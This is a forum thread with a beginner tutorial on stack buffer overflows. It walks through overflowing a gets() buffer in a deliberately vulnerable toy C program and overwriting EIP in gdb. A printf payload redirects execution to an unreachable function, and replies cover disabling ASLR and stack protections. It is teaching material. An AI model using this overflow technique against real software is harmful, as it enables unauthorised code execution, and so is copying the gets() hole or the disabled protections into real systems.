Author Topic: Easy intro to (local) exploitation  (Read 3901 times)

0 Members and 2 Guests are viewing this topic.

Offline b0whunter

  • Serf
  • *
  • Posts: 41
  • Cookies: 11
  • The finest sword plunged into salt water will rust
    • View Profile
    • My journal
Easy intro to (local) exploitation
« on: January 04, 2014, 04:38:36 am »


I will show how simple the basics of exploitation are.


We will illustrate what happens when program takes user input, what happens when a buffer is overflowed and take control of the execution of the program and redirect it to an area you do not have access.


Code: [Select]
#include <stdio.h>


void return_input(void)
{
    char array[8];


    gets(array);
    printf("%s\n",array);
}


void bingo(void)
{
    printf("You successfully exploited a vulnerability\n");
}


int main()
{
    int i = 0;
    return_input();
    if (i==1)
        bingo();
    return 0;
}


Now this program reads user input into a buffer and then outputs it. Then there is this other function that says you exploited a vulnerability. In theory you can never get that function to run. "i" is set to 0 and need to equal 1. Go ahead and try it. only the return_input function works.


here's a first try:


Code: [Select]
root@bt:~# ./ex
AAAAAAAAAA
AAAAAAAAAA


I wrote 10 A's and it wrote back 10 A's on the screen.


What if I try more A's:


Code: [Select]
root@bt:~# ./ex
AAAAAAAAAAAAAAAAAAA\
AAAAAAAAAAAAAAAAAAA\
Segmentation fault (core dumped)


Thats what we want! Lets take a look in a debugger:


Code: [Select]
root@bt:~# gdb ex
GNU gdb (GDB) 7.1-ubuntu
Copyright (C) 2010 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /root/ex...(no debugging symbols found)...done.
(gdb)


Lets crash it and check the registers. Remember, the eip is what will give you control of the program. If we can overwrite that register, we can gain control of execution.
Lets try:


Code: [Select]
(gdb) run
Starting program: /root/ex
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD
AAAAAAAABBBBBBBBCCCCCCCCDDDDDDDD


Program received signal SIGSEGV, Segmentation fault.
0x43434343 in ?? ()
(gdb) i r
eax            0x21    33
ecx            0xb7fca4e0    -1208179488
edx            0xb7fcb360    -1208175776
ebx            0xb7fc9ff4    -1208180748
esp            0xbffff530    0xbffff530
ebp            0x43434343    0x43434343
esi            0x0    0
edi            0x0    0
eip            0x43434343    0x43434343    <-----
eflags         0x10246    [ PF ZF IF RF ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51


yes! We overwrote the eip register with 43s (i.e. C).
We need to overwrite exactly the 4bytes of eip. lets try:


Code: [Select]
Starting program: /root/ex
AAAAAAAABBBBBBBBCCCCAAAA 
AAAAAAAABBBBBBBBCCCCAAAA


Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
(gdb) i r
eax            0x19    25
ecx            0xb7fca4e0    -1208179488
edx            0xb7fcb360    -1208175776
ebx            0xb7fc9ff4    -1208180748
esp            0xbffff530    0xbffff530
ebp            0x43434343    0x43434343
esi            0x0    0
edi            0x0    0
eip            0x41414141    0x41414141 <-------
eflags         0x10246    [ PF ZF IF RF ]
cs             0x73    115
ss             0x7b    123
ds             0x7b    123
es             0x7b    123
fs             0x0    0
gs             0x33    51


Bingo! we overwrote the eip with our 4 As.
Now we couold replace the 4 As with an actual address, but what? Sometimes it is enough to access an unauthorized part of a program rather than have a shell, so lets keep it simple and try that.
Let's see what the program looks like with [disas main] and find where we want to go:


Code: [Select]
(gdb) disas main
Dump of assembler code for function main:
   0x08048446 <+0>:    push   %ebp
   0x08048447 <+1>:    mov    %esp,%ebp
   0x08048449 <+3>:    and    $0xfffffff0,%esp
   0x0804844c <+6>:    sub    $0x10,%esp
   0x0804844f <+9>:    movl   $0x0,0xc(%esp)
   0x08048457 <+17>:    call   0x8048414 <return_input>
   0x0804845c <+22>:    cmpl   $0x1,0xc(%esp)
   0x08048461 <+27>:    jne    0x8048468 <main+34>
   0x08048463 <+29>:    call   0x8048432 <bingo>    <-----------
   0x08048468 <+34>:    mov    $0x0,%eax
   0x0804846d <+39>:    leave 
   0x0804846e <+40>:    ret   
End of assembler dump.


At address 0x08048463, it calls the bingo function, a function I cannot access. (you could pretend it's authentication etc.)


Well we have our address, lets quit the debugger and exploit the program. Remember, we have to reverse the bytes!


Code: [Select]
root@bt:~# printf "AAAAAAAABBBBBBBBCCCC\x63\x84\x04\x08" |./ex
AAAAAAAABBBBBBBBCCCCc�
You successfully exploited a vulnerability


Voila, we got the program to access a function that we had no access to! Simple...
“Engage people with what they expect; it is what they are able to discern and confirms their projections. It settles them into predictable patterns of response, occupying their minds while you wait for the extraordinary moment — that which they cannot anticipate.”
― Sun Tzu, The Art of War

Offline e233

  • NULL
  • Posts: 1
  • Cookies: 0
    • View Profile
Re: Easy intro to (local) exploitation
« Reply #1 on: January 26, 2014, 01:46:56 pm »
Pretty basic, but really slow and nice done. +1 thanks for writing it.
« Last Edit: January 26, 2014, 01:47:44 pm by e233 »

Offline b0whunter

  • Serf
  • *
  • Posts: 41
  • Cookies: 11
  • The finest sword plunged into salt water will rust
    • View Profile
    • My journal
Re: Easy intro to (local) exploitation
« Reply #2 on: January 26, 2014, 07:05:28 pm »
You're welcome. Stack-based buffer overflow exploits are basic. If you clearly understand this simple example, you know the foundation of such exploits. Overwrite eip and control the flow of execution. The input can cone from the user locally, remotely, from an application; from a mp3 file to a player or a game server connection. Im writing some more on evading security measures but theres also a 2 more tutorials I wrote with more details that you can find on this board.
« Last Edit: January 26, 2014, 11:16:05 pm by b0whunter »
“Engage people with what they expect; it is what they are able to discern and confirms their projections. It settles them into predictable patterns of response, occupying their minds while you wait for the extraordinary moment — that which they cannot anticipate.”
― Sun Tzu, The Art of War

Offline Clone

  • Peasant
  • *
  • Posts: 50
  • Cookies: 2
  • Always trying to find the value of x
    • View Profile
Re: Easy intro to (local) exploitation
« Reply #3 on: January 26, 2014, 09:39:05 pm »
simple but impressive!
One who walks the line between light and dark, with no ties to either side. No morals or emotions clouding their judgment,able to accomplish tasks and solve problems in the most efficient and logical way.

Offline monod

  • /dev/null
  • *
  • Posts: 5
  • Cookies: 0
    • View Profile
Re: Easy intro to (local) exploitation
« Reply #4 on: February 04, 2014, 01:31:02 am »
hey all.
I'm trying this tutorial to get my hands into some practice, after some long, long time.
I've noticed that I can't get my 'rip' register overwritten ('cause it's called like that by gdb, is it a difference in architecture maybe?). How can I explain to you what I do get?
I just type more A's until I get SIGSEGV and... 'rip' points to <return_input+33>
After one 'disas return_input' I discovered that return_input+33 is... 'retq', the end of the function.
What's going on in my computer? :)
Thanks.
--  |||||v(()))\ (:

Offline b0whunter

  • Serf
  • *
  • Posts: 41
  • Cookies: 11
  • The finest sword plunged into salt water will rust
    • View Profile
    • My journal
Re: Easy intro to (local) exploitation
« Reply #5 on: February 04, 2014, 04:42:40 am »
The example was done on a 32-bit intel architecture and you are on a 64-bit version. eip is rip on 64-bit.


Also prior to attempting the example, issue the following command:
"echo 0 > /proc/sys/kernel/randomize_va_space"


Compile the vulnerable program with these flag also:
" gcc -fno-stack-protector -z execstack"


If you would rather follow the example like it is (in 32-bit environment) use this option also when compiling the vulnerable program :
"gcc -m32"
“Engage people with what they expect; it is what they are able to discern and confirms their projections. It settles them into predictable patterns of response, occupying their minds while you wait for the extraordinary moment — that which they cannot anticipate.”
― Sun Tzu, The Art of War

Offline monod

  • /dev/null
  • *
  • Posts: 5
  • Cookies: 0
    • View Profile
Re: Easy intro to (local) exploitation
« Reply #6 on: February 04, 2014, 11:41:30 am »
The example was done on a 32-bit intel architecture and you are on a 64-bit version. eip is rip on 64-bit.


Also prior to attempting the example, issue the following command:
"echo 0 > /proc/sys/kernel/randomize_va_space"


Compile the vulnerable program with these flag also:
" gcc -fno-stack-protector -z execstack"


If you would rather follow the example like it is (in 32-bit environment) use this option also when compiling the vulnerable program :
"gcc -m32"
I think the more logical way to circumvent this difference, for this tutorial, would be to 'gcc -m32' :D
Since..this
echo 0 > /proc/sys/kernel/randomize_va_space
sounds like a setting being set for this specific example file
and
gcc -fno-stack-protector -z execstack
hmm... sounds too easy to just disable the stack-protector :D


By the way, from this example it seems to me that 64bit programs do have a stack protector while 32bit ones do not? This sounds weird, so I ask you. I sorta intend to know what's happening, in addition to learn commands.
Thanks!
--  |||||v(()))\ (:

Offline b0whunter

  • Serf
  • *
  • Posts: 41
  • Cookies: 11
  • The finest sword plunged into salt water will rust
    • View Profile
    • My journal
Re: Easy intro to (local) exploitation
« Reply #7 on: February 04, 2014, 04:55:42 pm »
32-bit does as well. The reason to disable security protection is to focus on the basics first.
“Engage people with what they expect; it is what they are able to discern and confirms their projections. It settles them into predictable patterns of response, occupying their minds while you wait for the extraordinary moment — that which they cannot anticipate.”
― Sun Tzu, The Art of War

Offline Fl0urite

  • /dev/null
  • *
  • Posts: 15
  • Cookies: -16
    • View Profile
Re: Easy intro to (local) exploitation
« Reply #8 on: February 26, 2014, 01:41:37 am »
I think the more logical way to circumvent this difference, for this tutorial, would be to 'gcc -m32' :D
Since..this
echo 0 > /proc/sys/kernel/randomize_va_space
sounds like a setting being set for this specific example file
and
gcc -fno-stack-protector -z execstack
hmm... sounds too easy to just disable the stack-protector :D


By the way, from this example it seems to me that 64bit programs do have a stack protector while 32bit ones do not? This sounds weird, so I ask you. I sorta intend to know what's happening, in addition to learn commands.
Thanks!
linux is very secure, it has many functions in the kernel to prevent many different kinds of exploits, most exploits don't require special conditions to work on windows.
If you feel my post was interesting or stood out, give me a cookie!